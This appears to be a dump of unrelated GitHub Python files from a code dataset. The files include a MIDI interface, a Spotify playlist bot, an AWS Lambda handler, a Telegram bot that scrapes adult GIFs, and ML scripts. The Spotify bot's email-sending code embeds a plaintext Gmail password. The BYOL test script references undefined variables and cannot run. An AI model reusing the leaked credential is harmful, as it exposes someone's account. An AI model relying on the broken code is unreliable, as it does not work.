MB\")\n","repo_name":"lemonsaurus/tyrant","sub_path":"tyrant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34779068609","text":"##\n# @file transmute/Dispatch/Dispatcher.py\n# @brief Contains the main dispatch director\n# @defgroup plugins\n# @{\n# @page Plugins\n# Transmute is based on a plugin architecture. This is implemented by the \n# @ref transmute.Dispatch.Dispatcher.Dispatcher \"Dispatcher\", and accomplished\n# by the importlib module. The @ref transmute.plugins.base \"base\" plugin provides the\n# base set of elements understood by transmute. The first output plugin is the\n# @ref transmute.plugins.wireshark \"wireshark\" plugin, which also serves as a sample\n# from which to develop further plugins.\n# @}\nimport os\nimport logging\nimport importlib\n\n##\n# @brief All of the items exported by this module\n__all__ = [\"Dispatcher\", \"DispatchError\"]\n##\n# @brief The module's top-level logger\n_logger = logging.getLogger('transmute.Dispatch')\n\n##\n# @class Dispatcher\n# @brief Directs the dispatch process for fully-parsed elements.\nclass Dispatcher(object):\n ##\n # @name __init__\n # @brief Load modules for dispatch\n # @param package [in] The directory from which to load modules\n # @param relative_to [in] The path in which package resides\n def __init__(self, package, relative_to='transmute'):\n self.log = logging.getLogger('transmute.Dispatch.Dispatcher')\n self.log.debug(\"Setting up Dispatcher for {}\".format(os.path.join(relative_to, package)))\n pkg = ['transmute'] + package.split(os.path.sep)\n self._pmod = [importlib.import_module(''.join(['.', pkg[pivot]]), '.'.join(pkg[:pivot])) for pivot in range(1, len(pkg))]\n self.log.debug(\"Parent modules: {}\".format([pmod.__name__ for pmod in self._pmod]))\n self.modules = [importlib.import_module(''.join(['.', mod[:-3]]), '.'.join(pkg)) for mod in (\n f for f in os.listdir(os.path.join('transmute', package)) if (f.endswith('.py') and f != '__init__.py'))\n ]\n self.log.debug(\"Loaded modules: {}\".format([mod.__name__ for mod in self.modules]))\n \n ##\n # @name register_all\n # @brief Register all of the loaded modules.\n def register_all(self, args_parser, xml_parser):\n for mod in self.modules:\n mod.register(args_parser, xml_parser)\n \n ##\n # @name push\n # @brief Push a @ref transmute.Dispatch.Dispatchable.Dispatchable \"Dispatchable\" to every loaded module.\n def push(self, dispatchable_obj):\n for mod in self.modules:\n mod.dispatch(dispatchable_obj)\n \n ##\n # @name getModules\n # @brief Get a list of all of the loaded modules.\n def getModules(self):\n #a copy of self.modules, to prevent accidental changes to the list\n return [mod for mod in self.modules]\n","repo_name":"Rakankou/transmute","sub_path":"transmute/Dispatch/Dispatcher.py","file_name":"Dispatcher.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"71556170190","text":"import os\nimport json\n\n\ndef read_dataset(dataset_path, num_instances):\n question_json_path = os.path.join(dataset_path, \"MultipleChoice_mscoco_val2014_questions.json\")\n questions = json.load(open(question_json_path, 'rt'))[\"questions\"]\n\n image_dir = os.path.join(dataset_path, \"coco_images/val2014\")\n audio_dir = os.path.join(dataset_path, \"questions_speech/val2014\")\n\n image_paths = []\n audio_paths = []\n for question in questions:\n image_id = question[\"image_id\"]\n question_id = question[\"question_id\"]\n image_path = os.path.join(image_dir, \"COCO_val2014_{:012d}.jpg\".format(image_id))\n audio_path = os.path.join(audio_dir, \"{}.flac\".format(question_id))\n image_paths.append((question_id, image_path))\n audio_paths.append((question_id, audio_path))\n \n image_paths.sort(key=lambda x: x[0])\n audio_paths.sort(key=lambda x: x[0])\n\n image_paths = image_paths[:num_instances]\n audio_paths = audio_paths[:num_instances]\n image_paths = list(map(lambda x: (x[0], x[1][1]), enumerate(image_paths)))\n audio_paths = list(map(lambda x: (x[0], x[1][1]), enumerate(audio_paths)))\n\n return image_paths, audio_paths\n ","repo_name":"libertyeagle/JellyBean","sub_path":"VQA/python/models_profiler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"2172502797","text":"import matplotlib.pyplot as plt\nimport oscilator as ho\nimport numpy as np\n\nh2 = ho.HarmonicOscillator(1.0,0.0,1.0,1.0)\n\nfig,ax = plt.subplots()\nlista_dt = [0.001,0.01,0.05]\n\nfor dt in lista_dt:\n T = 3*h2.period(dt)\n t, x_num = h2.oscillate(dt,T) \n x_anal = h2.x_analitičko(t) \n\n plt.plot(t,x_anal)\n plt.scatter(t,x_num)\n\nplt.xlabel(\"t\")\nplt.ylabel(\"x\")\nplt.legend([\"analitički\",\"numerički\"])\nplt.show()\n\n\n","repo_name":"leajambr/PAF","sub_path":"vjezbe_6/zadatak_2.py","file_name":"zadatak_2.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41192932543","text":"#!/usr/bin/python3\n\nfrom pygame import midi as midi\nimport inspect\n\n# Not the best solution with this class, \n# dataclass structures were introduced in Python 3.7\n# but VSERPi images are mostly distributed with <3.7 version,\n# so for sake of simplicity I decided to make \"workaround\"\nclass DeviceInfo:\n def __init__(self, name, input):\n self.name = name\n self.input = input\n\n name = None\n input = None\n\n\nclass MidiInterface:\n _connectedDeviceId = -1\n _deviceInfo = DeviceInfo('N\\\\A', -1)\n _midiController = None\n\n def __init__(self):\n midi.init()\n self.scanForDevices()\n self._midiController = midi.Input(self._connectedDeviceId)\n\n def getDeviceName(self):\n device = midi.get_device_info(self._connectedDeviceId)\n # print(str(device[1]).split(\"'\")[1])\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n return device_info.name\n\n def scanForDevices(self):\n devices_number = midi.get_count()\n # print(\"devices_number: \", devices_number)\n if devices_number > 0:\n for deviceIndex in range(0, devices_number):\n # get_device_info(an_id) -> (interf, name, input, output, opened)\n device = midi.get_device_info(deviceIndex)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n\n print(\"Found devices list: \")\n if device_info.input is 1: # \"input\" tells if \"device\" is input or output, 0 for 0utput, 1 for 1nput\n print(\" - \", device_info.name)\n\n\n if \"nanoKONTROL2\" in device_info.name and device_info.input == 1:\n print(\"New device name: \", device_info.name, \" , new device index: \", deviceIndex,sep=\"\") # todo logic some kind of\n self._connectedDeviceId = deviceIndex\n self._deviceInfo.name = device_info.name\n self._deviceInfo.input = device_info.input\n # return True\n elif device_info.input == 1 and self._connectedDeviceId == -1:\n self._deviceInfo.name = device_info.name\n self._deviceInfo.input = device_info.input\n self._connectedDeviceId = deviceIndex\n \n\n if self._connectedDeviceId != -1:\n return True\n else:\n return False\n\n def checkConnection(self):\n if self._connectedDeviceId == -1:\n return False\n\n device = midi.get_device_info(self._connectedDeviceId)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n if \"nanoKONTROL2\" in device_info.name and device_info.input == 1:\n return True\n if self.scanForDevices() is True:\n return True\n return False\n\n def getMidiMsg(self):\n #print(\"connectedDeviceId = \", self._connectedDeviceId)\n midiInput = self._midiController.read(1)\n if len(midiInput) > 0:\n # print(midiInput[0][0])\n return(midiInput[0][0])\n return None \n #print(inspect.stack()[0][3])\n\n def menuMidiChoice(self, button):\n print(\"non available\")\n\n def printDevices(self):\n devices_number = midi.get_count()\n if devices_number > 0:\n for deviceIndex in range(0, devices_number):\n # get_device_info(an_id) -> (interf, name, input, output, opened)\n device = midi.get_device_info(deviceIndex)\n device_info = DeviceInfo(str(device[1]).split(\"'\")[1], device[2])\n #print(device_info.name, device_info.input)\n\n\n\nif __name__ == '__main__':\n midiInterface = MidiInterface()\n midiInterface.printDevices()\n while True:\n midiInterface.getMidiMsg()\n","repo_name":"aleksoo/vserpi_menu","sub_path":"MidiInterface.py","file_name":"MidiInterface.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"26560852325","text":"\nimport recommender as recom\nfrom pyfancy import pyfancy\nimport time\n\ndef advisor5(client_portfolio, allSecurities, economy):\n \n divers_sectors, divers_percent = recom.bc_sector_allocation(economy)\n # categorize existing securities by type of asset\n pyfancy.pyfancy().cyan(\"\\n*** Portfolio analysis.... ***\\n\").output()\n time.sleep(1)\n stocks_held, bonds_held = client_portfolio.extract_securities_by_type(allSecurities)\n \n # categorize existing securities by sector\n pyfancy.pyfancy().cyan(\"\\n *** Sectors you currently hold in stocks: ***\").output()\n time.sleep(2)\n portfolio_sector_dict = client_portfolio.categorize_stocks_by_sector(allSecurities)\n \n # calculate recommended percentages per sector\n pyfancy.pyfancy().cyan(\"\\n *** Sectors recommended to hold in stocks: ***\").output()\n time.sleep(2)\n recomm_sector_dict = recom.recomm_sector_allocation(client_portfolio.portfolio, divers_percent, divers_sectors, sum(portfolio_sector_dict.values()))\n \n # add recommended sectors that do not exist\n pyfancy.pyfancy().cyan(\"\\n *** Looking for sectors that should not be in your portfolio ***\").output()\n time.sleep(2)\n sectors_to_del = client_portfolio.sectors_you_should_not_have(recomm_sector_dict, portfolio_sector_dict)\n if (len(sectors_to_del)==0):\n print ('No sectors to remove')\n else:\n for sector_del in sectors_to_del:\n client_portfolio.deleteSector(sector_del, allSecurities)\n \n \n # refine securities per sector\n pyfancy.pyfancy().cyan(\"\\n *** Refining exposure for sectors you hold ***\").output()\n time.sleep(2)\n for key, value in recomm_sector_dict.items():\n \n time.sleep(1)\n diff = recomm_sector_dict[key] - portfolio_sector_dict.get(key, 0) \n \n if (diff == recomm_sector_dict[key]):\n # portfolio does not contain the recommended sector\n print ('No {} in the portfolio. You should add {} of them'.format(key, value))\n recommendations = recom.rank_stocks_without_bc(key)\n pop = recom.recommend_stock(recommendations) \n security = next(pop)\n client_portfolio.addNewSecurity(security, value, allSecurities)\n \n elif (diff > 0):\n print ('You have {}% of {}. You should have {}% in {}.'.format(portfolio_sector_dict.get(key, 0), key, recomm_sector_dict.get(key, 0), key))\n current_holdings = client_portfolio.extract_securities_by_sector(key, allSecurities)\n print (\"Currently holding {} stocks in sector {}:\".format(len(current_holdings), key))\n for k, v in current_holdings.items():\n pyfancy.pyfancy().bold().white(\"{} {} %\".format(k,v)).output()\n\n recommendations = recom.rank_stocks_without_bc(key)\n pop = recom.recommend_stock(recommendations) \n security = next(pop)\n client_portfolio.addNewSecurity(security, diff, allSecurities)\n \n elif (diff < 0):\n print ('You have {}% of {}. You should have {}% in {}.'.format(portfolio_sector_dict.get(key, 0), key, recomm_sector_dict.get(key, 0), key))\n current_holdings = client_portfolio.extract_securities_by_sector(key, allSecurities)\n print (\"Currently holding {} stocks in sector {}:\".format(len(current_holdings), key))\n for k, v in current_holdings.items():\n pyfancy.pyfancy().bold().white(\"{} {} %\".format(k,v)).output()\n current_holdings_list = sorted(current_holdings, key=current_holdings.get, reverse=True)\n diff = diff * (-1)\n for k in current_holdings_list:\n v = current_holdings[k]\n if diff == 0:\n break\n elif (diff > 0 and v > diff):\n client_portfolio.setExposure(k, v - diff)\n diff = 0\n elif (diff > 0 and v <= diff):\n client_portfolio.deteleSecurity(k, allSecurities)\n diff -= v\n #print ('\\n \\n Exposure left in portfolio: {}'.format(client_portfolio.extra_exposure))\n stocks_held, bonds_held = client_portfolio.extract_securities_by_type(allSecurities) \n return client_portfolio","repo_name":"rucsa/thesis_benchmark_advisor","sub_path":"advisor5worker.py","file_name":"advisor5worker.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42913806172","text":"\"\"\"\n42. 接雨水\n\n给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。\n\n\n\n上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] 表示的高度图,在这种情况下,可以接 6 个单位的雨水(蓝色部分表示雨水)。 感谢 Marcos 贡献此图。\n\n示例:\n\n输入: [0,1,0,2,1,0,1,3,2,1,2,1]\n输出: 6\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/trapping-rain-water\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\n\"\"\"\n\n\nclass Solution:\n def trap(self, height):\n ans = 0\n h1 = 0\n h2 = 0\n for i in range(len(height)):\n h1 = max(h1, height[i])\n h2 = max(h2, height[-i - 1])\n ans = ans + h1 + h2 - height[i]\n return ans - len(height) * h1\n\n\nif __name__ == '__main__':\n solu = Solution()\n print(solu.trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]))\n","repo_name":"song61069140/LeetCodePython","sub_path":"question_01_99/question_42.py","file_name":"question_42.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17395632443","text":"\"\"\"\r\n\r\nWhat this class does\r\n\r\n\r\n\"\"\"\r\nfrom io import StringIO\r\n\r\nfrom Config import Config\r\nfrom Profile import Profile\r\n\r\n\r\nclass Wrath:\r\n\r\n def create_profile(self, profile):\r\n config = Config()\r\n expdate = profile.exp_date.split()\r\n exp_month = expdate[0]\r\n exp_year = expdate[2]\r\n card_type = config.get_card_type(profile.card_number)\r\n if card_type == 'American Express':\r\n card_type = 'Amex'\r\n file = str([{\r\n \"billingAddress\": {\r\n \"city\": profile.city,\r\n \"country\": profile.country,\r\n \"email\": profile.email,\r\n \"line1\": profile.address,\r\n \"line2\": profile.apt,\r\n \"line3\": \"\",\r\n \"name\": f'{profile.first_name} {profile.last_name}',\r\n \"phone\": profile.phone,\r\n \"postCode\": profile.zip_code,\r\n \"state\": config.us_state_abbreviations[profile.state]\r\n },\r\n \"name\": profile.profile_name,\r\n \"onlyCheckoutOnce\": \"FALSE\",\r\n \"paymentDetails\": {\r\n \"cardCvv\": profile.cvv,\r\n \"cardExpMonth\": exp_month,\r\n \"cardExpYear\": exp_year,\r\n \"cardNumber\": profile.card_number,\r\n \"cardType\": card_type,\r\n \"nameOnCard\": profile.card_holder_name\r\n },\r\n \"sameBillingAndShippingAddress\": \"true\",\r\n \"shippingAddress\": {\r\n \"city\": profile.city,\r\n \"country\": profile.country,\r\n \"email\": profile.email,\r\n \"line1\": profile.address,\r\n \"line2\": profile.apt,\r\n \"line3\": \"\",\r\n \"name\": f'{profile.first_name} {profile.last_name}',\r\n \"phone\": profile.phone,\r\n \"postCode\": profile.zip_code,\r\n \"state\": config.us_state_abbreviations[profile.state]\r\n }\r\n }])\r\n file = file.replace(\"'\", '\"').replace(\": \", \":\").replace(\", \", \",\").replace('\"true\"', \"true\").replace(\"False\",\"false\").replace(\"True\", \"true\")\r\n file = StringIO(file)\r\n return file\r\n\r\n def create_profiles(self, profiles):\r\n file = \"\"\r\n if type(profiles[0]) == Profile:\r\n for profile in profiles:\r\n file += f'{str(self.create_profile(profile).readline())[1:-1]},'\r\n else:\r\n for profile in profiles:\r\n file += f'{str(profile)[1:-1]},'\r\n file = file.replace(\"'\", '\"').replace(\": \", \":\").replace(\", \", \",\").replace('\"true\"', \"true\").replace(\"False\",\"false\").replace(\"True\", \"true\")\r\n file = f\"[{str(file)[:-1]}]\"\r\n file = StringIO(file)\r\n return file\r\n","repo_name":"andrewgalvin/DiscordProfileConverter","sub_path":"BotProfiles/Wrath.py","file_name":"Wrath.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"891629538","text":"import pandas as pd\nimport argparse\nimport os\n\n\ndesctiptionStr = '''\nExtract and de-replicate GO terms for BiNGO reference:\nThe format of custom annotation/ontology files in BiNGO is the same as the Cytoscape annotation and ontology file formats. To make a custom annotation file, just parse your annotation into the following form :\n\n(species=Saccharomyces cerevisiae)(type=Biological Process)(curator=GO)\nYAL001C = 0006384\nYAL002W = 0045324\nYAL002W = 0045324\nYAL003W = 0006414\nYAL004W = 0000004\nYAL005C = 0006616\nYAL005C = 0006457\nYAL005C = 0000060\nYAL007C = 0006888\nYAL008W = 0000004\n...\n'''\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Extract and de-replicate GO terms for BiNGO reference')\n parser.add_argument('path')\n parser.add_argument('--species', help='species', default='Not_set')\n parser.add_argument(\n '--curator', help='curator, generator of the annotation', default='Not_set')\n args = parser.parse_args()\n interproscanOutTsv = args.path.strip()\n species = args.species\n curator = args.curator\n convertedFile = f'{os.path.splitext(interproscanOutTsv)[0]}_GO.tair'\n source = pd.read_csv(interproscanOutTsv, sep='\\t', header=None, usecols=[0, 13])\n # print(source.head(10))\n with open(convertedFile, 'w') as writer:\n # write header:\n writer.write(f'(species={species})(type=general)(curator={curator})\\n')\n # I am not sure but the type seems not important at all, because BiNGO have its own\n # database for the hierarchy. It might be useful only as an identifier if you need to customize\n # the reference to part of the genome/proteome.\n for num, line in source.iterrows():\n if pd.isna(line.loc[13]):\n continue\n else:\n gos = line.loc[13].split('|')\n gos = [go.split(':')[1] for go in gos]\n id = line.loc[0]\n for go in gos:\n writer.write(f'{id} = {go}\\n')\n\n print(convertedFile)\n","repo_name":"snail123815/BIO_tools","sub_path":"For_other_tools/parse_interproscann_go_annotation_BiNGO.py","file_name":"parse_interproscann_go_annotation_BiNGO.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30173589740","text":"import numpy as np\r\n\r\n#downsample a trajectory of n points to m points based on distance between those points\r\n\r\n#function to get the total distance of a n x d trajectory\r\n#arguments\r\n#traj: nxd vector, where n is number of points and d is number of dims\r\n#returns the total distance of traj, calculated using euclidean distance \r\ndef get_traj_dist(traj):\r\n dist = 0.\r\n for n in range(len(traj) - 1):\r\n dist = dist + np.linalg.norm(traj[n + 1] - traj[n])\r\n #if (DEBUG):\r\n # print('Traj total dist: %f' % (dist))\r\n return dist\r\n \r\n#downsample to a certain number of points\r\ndef db_downsample(traj, new_len):\r\n (n_pts, n_dims) = np.shape(traj)\r\n total_dist = get_traj_dist(traj)\r\n interval_len = total_dist / (new_len - 1)\r\n sum_len = 0.0\r\n out_traj = np.zeros((new_len, n_dims))\r\n ind = 0\r\n for n in range(n_pts - 1):\r\n if (sum_len >= 0.0):\r\n out_traj[ind, :] = traj[n, :]\r\n ind += 1\r\n sum_len -= interval_len\r\n sum_len += np.linalg.norm(traj[n + 1] - traj[n])\r\n out_traj[-1, :] = traj[-1, :]\r\n return out_traj\r\n \r\n#downsample to a certain distance between points\r\ndef db_downsample_dist(traj, seg_len):\r\n (n_pts, n_dims) = np.shape(traj)\r\n interval_len = seg_len\r\n sum_len = 0.0\r\n out_traj = np.zeros((n_pts, n_dims))\r\n ind = 0\r\n for n in range(n_pts - 1):\r\n if (sum_len >= 0.0):\r\n out_traj[ind, :] = traj[n, :]\r\n ind += 1\r\n sum_len -= interval_len\r\n sum_len += np.linalg.norm(traj[n + 1] - traj[n])\r\n out_traj[ind, :] = traj[-1, :]\r\n ind += 1\r\n out_traj = out_traj[0:ind]\r\n return out_traj\r\n\r\n#main program for testing \r\nif __name__ == '__main__':\r\n x = np.linspace(0, 10, 1000)\r\n #y = np.sin(x)\r\n y = (x - 5)**3\r\n traj = np.transpose(np.vstack((x, y)))\r\n ds_traj = db_downsample(traj, 10)\r\n import matplotlib.pyplot as plt\r\n plt.figure()\r\n plt.plot(traj[:, 0], traj[:, 1], 'b', lw=3)\r\n plt.plot(ds_traj[:, 0], ds_traj[:, 1], 'r-.', lw=3, ms=7)\r\n plt.show()\r\n \r\n ","repo_name":"brenhertel/Pearl-ur5e","sub_path":"brendan_ur5e/src/scripts/elmap_code/scripts/db_downsample.py","file_name":"db_downsample.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"35098255956","text":"import argparse\n\nimport __init_path__\n\nfrom scripts.graph_optimization import g2o_configs\nfrom scripts.graph_optimization.base_search import BaseSearch\nfrom slam.graph_optimization import TrajectoryEstimator\n\n\ndef main(dataset_root,\n config_type,\n strides,\n strides_sigmas,\n loop_sigma,\n loop_threshold,\n rotation_weight,\n max_iterations,\n vis_dir,\n pred_dir):\n\n assert len(strides) == len(strides_sigmas)\n strides_sigmas = {stride: weight for stride, weight in zip(strides, strides_sigmas)}\n config = getattr(g2o_configs, config_type)\n trajectory_names = BaseSearch().get_trajectory_names(config['1'][0])\n rpe_indices = BaseSearch().get_rpe_mode(config)\n X, y, groups = BaseSearch().get_data(config=config,\n dataset_root=dataset_root,\n trajectory_names=trajectory_names,\n val_mode='last')\n estimator = TrajectoryEstimator(strides_sigmas=strides_sigmas,\n loop_sigma=loop_sigma,\n loop_threshold=loop_threshold,\n rotation_weight=rotation_weight,\n max_iterations=max_iterations,\n rpe_indices=rpe_indices,\n verbose=True,\n vis_dir=vis_dir,\n pred_dir=pred_dir)\n metrics = estimator.predict(X, y, visualize=True, trajectory_names=trajectory_names)\n print(metrics)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset_root', type=str)\n parser.add_argument('--config_type', type=str, help='Name of config defined in g2o_configs.py')\n parser.add_argument('--strides', type=str, nargs='+',\n help='List of strides. For these strides weights must be provided')\n parser.add_argument('--strides_sigmas', type=int, nargs='+',\n help='Std of predictions from networks trained on different strides')\n parser.add_argument('--loop_sigma', type=int,\n help='Std of prediction from network trained on relocalization estimator results')\n parser.add_argument('--loop_threshold', type=int,\n help='Threshold value used to detect loops. Relocalization estimator returns pairs of similar '\n 'frames (frame_i, frame_j).'\n 'If (j - i) > loop_threshold then the pair of similar frames is considered to be the start'\n 'and the end of the loop')\n parser.add_argument('--rotation_weight', type=float,\n help='weight of rotation constrains.')\n parser.add_argument('--max_iterations', type=int, default=5000,\n help='Limit of iterations in g2o backend')\n parser.add_argument('--vis_dir', type=str, help='Path to visualization dir')\n parser.add_argument('--pred_dir', type=str, help='Path to prediction dir')\n\n args = parser.parse_args()\n main(**vars(args))\n","repo_name":"SamsungLabs/odometry","sub_path":"scripts/graph_optimization/estimate_trajectory.py","file_name":"estimate_trajectory.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"85"} +{"seq_id":"9050630959","text":"import requests\nimport bs4\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport smtplib\nimport os\n\n\nclass Send:\n \n def __init__(self):\n \n self.username = os.system.environ[\"username\"]\n self.scope = 'playlist-modify-public'\n self.client_id = os.system.environ[\"id\"]\n self.client_secret = os.system.environ[\"secret\"]\n self.redirect_uri = \"http://localhost:8888/callback\"\n \n def get_info(self):\n \n self.date = \"\"\n self.ig = self.e_ig.get()\n \n if int(self.eday.get()) < 10 and int(self.emonth.get()) < 10:\n self.date = f\"0{self.eyear.get()}-0{self.emonth.get()}-{self.eday.get()}\"\n \n elif int(self.emonth.get()) < 10:\n self.date = f\"{self.eyear.get()}-0{self.emonth.get()}-{self.eday.get()}\"\n \n elif int(self.eday.get()) < 10:\n self.date = f\"0{self.eyear.get()}-{self.emonth.get()}-{self.eday.get()}\"\n \n \n \n def get_songs(self):\n \n url = f\"https://www.billboard.com/charts/hot-100/{self.date}/\"\n soup = bs4.BeautifulSoup(requests.get(url).text, \"lxml\")\n soup = soup.find_all(\"div\", class_ = \"o-chart-results-list-row-container\")\n self.songs = [ b.find(\"h3\").getText(strip = True) for b in soup]\n \n \n def create_spotify_list(self):\n \n self.auth_manager = SpotifyOAuth(self.client_id, self.client_secret,\n self.redirect_uri,scope = \"playlist-modify-public\")\n \n self.list_songs = spotipy.Spotify(auth_manager = self.auth_manager)\n \n self.list_songs.user_playlist_create(self.username, \"The list obada made me\",\n True, False, \"created by obada\")\n \n \n def add_songs_to_list(self):\n\n self.playlist_id = self.list_songs.user_playlists(self.username)[\"items\"][0][\"id\"]\n self.tracks = [ self.list_songs.search(a, 1, type = \"track\")[\"tracks\"][\"items\"][0][\"uri\"] for a in self.songs ]\n self.list_songs.user_playlist_add_tracks(self.username, self.playlist_id, self.tracks, 0)\n \n \n def send_via_mail(self):\n \n mail = \"obadahpy@gmail.com\"\n msg = f\"\"\"Subject:Spotify playlist\\n\\n\n here is the link of the spotify playlist i made it contains the top 100 tren songs\n for the date you wanted\\n\n https://open.spotify.com/playlist/{self.list_songs.user_playlists(self.username)['items'][0]['id']}\"\"\"\n a = smtplib.SMTP(\"smtp.gmail.com\", 587)\n a.starttls()\n a.login(mail, \"vjmoezoordwzivws\")\n a.sendmail(mail, self.e_ig.get(), msg)\n a.quit","repo_name":"Townsend0/spotify-bot","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8037227352","text":"import boto3\nfrom botocore.config import Config\nimport json\nimport os\n\nTABLE_NAME = os.environ['TABLE_NAME']\n\nconfig = Config(connect_timeout=5, read_timeout=5, retries={'max_attempts': 1})\ndynamodb = boto3.client('dynamodb', config=config)\n\ndef lambda_handler(event, context):\n print('received event: {}'.format(json.dumps(event)))\n\n # we configured the event source to only receive one message at a time\n msg = json.loads(event['Records'][0]['body'])\n\n # store the received response message in our DynamoDB table for the given rfq-id\n response = dynamodb.put_item(\n TableName = TABLE_NAME, \n Item = {\n 'id': {'S': msg['rfq-id']},\n 'responder': {'S': msg['responder']},\n 'quote': {'N': str(msg['quote'])}\n }\n )\n\n return","repo_name":"aws-samples/asynchronous-messaging-workshop","sub_path":"code/lab-3/quotes-response-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"85"} +{"seq_id":"25959120841","text":"import random\nimport time\n\nimport aiohttp\nfrom aiogram import types\nfrom aiogram.utils.exceptions import MessageCantBeDeleted\nfrom bs4 import BeautifulSoup\n\nfrom handlers.parser.headers import headers\nfrom create_bot import rate_limit, bot\n\nlist_images = []\npopular_gifs = []\n\n\n@rate_limit(30, 'p')\nasync def cmd_p(message: types.Message):\n try:\n await message.delete()\n except MessageCantBeDeleted:\n pass\n\n if time.localtime().tm_wday == 4:\n await show(message)\n else:\n mem = await get_gif()\n await message.answer(\"Ты чё??? Порно только по пятницам!\")\n await message.answer_animation(mem)\n\n\nasync def show(message: types.Message):\n if message.chat.id in bot['config'].bot.trusted_groups:\n image = await get_image()\n await message.answer_animation(image)\n else:\n await message.answer('Сорян, лавочка закрылась. Можно попросить админа в личку открыть доступ')\n\n\nasync def get_image():\n global list_images\n if not list_images:\n url = f'https://2gifs.ru/page/{random.randint(2, 30)}'\n async with aiohttp.ClientSession() as session:\n async with session.get(url=url, headers=headers) as response:\n soup = BeautifulSoup(await response.text(), 'lxml')\n items = soup.find_all('img', referrerpolicy=\"no-referrer\")\n for i in items:\n list_images.append(i['src'])\n\n image = random.choice(list_images)\n list_images.remove(image)\n return image\n\n\nasync def get_gif():\n global popular_gifs\n if not popular_gifs:\n images = []\n url = 'https://gfycat.com/ru/popular-gifs'\n async with aiohttp.ClientSession() as session:\n async with session.get(url=url, headers=headers) as response:\n if not response.ok:\n return None\n soup = BeautifulSoup(await response.text(), 'lxml')\n items = soup.find_all('img', class_=\"image media\")\n for i in items:\n images.append(i['src'])\n popular_gifs = images.copy()\n\n gif = random.choice(popular_gifs)\n popular_gifs.remove(gif)\n return gif\n","repo_name":"ChirkovRoman1984/AlcoBot","sub_path":"handlers/parser/porno.py","file_name":"porno.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10423319217","text":"import torch\nimport sys\nimport os \nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom os.path import join\nfrom byol_pytorch import BYOL\nfrom torchvision import models\nfrom torch.optim import Adam\nfrom hyper import hyper as hp\nfrom dataset import ImgDataset\n\n\ndef main(\n data_dir: str, \n model_path: str,\n save_path: str \n):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n feat_extractor\n model = ImgClassifier()\n # Define dataloader \n train_set = ImgDataset(join(data_dir,'train'), hp.img_size)\n val_set = ImgDataset(join(data_dir,'val'), hp.img_size)\n train_loader = DataLoader(train_set, batch_size=hp.batch_size)\n val_loader = DataLoader(val_set, batch_size=hp.batch_size)\n opt = Adam(learner.parameters(), lr=hp.lr)\n best_loss = float('inf')\n for e in range(hp.n_epoch):\n learner.train()\n train_loss, val_loss = 0,0\n for images in tqdm(train_loader, desc=f'Training epoch {e}:'):\n images = images.to(device)\n loss = learner(images)\n opt.zero_grad()\n loss.backward()\n opt.step()\n learner.update_moving_average() # update moving average of target encoder\n train_loss += loss.item()\n for images in tqdm(val_loader, desc=f'Validation epoch {e}:'):\n loss = learner(images)\n val_loss += loss.item()\n train_loss, val_loss = train_loss/len(train_loader), val_loss/len(val_loader)\n print(f'Epoch {e}: training loss={train_loss}, val loss={val_loss}')\n if best_loss > val_loss:\n best_loss = val_loss\n torch.save(resnet.state_dict(), join(save_dir, 'best_model.mdl'))\n if (e+1)%10 == 0:\n torch.save(resnet.state_dict(), join(save_dir, f'checkpoint{e+1}.mdl'))\n\nif __name__ == '__main__':\n data_dir, model_path, save_path = sys.argv[1], sys.argv[2], sys.argv[3]\n main(data_dir, model_path, save_path)","repo_name":"nervjack2/NTU-DLCV-2021","sub_path":"hw4/p2_src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 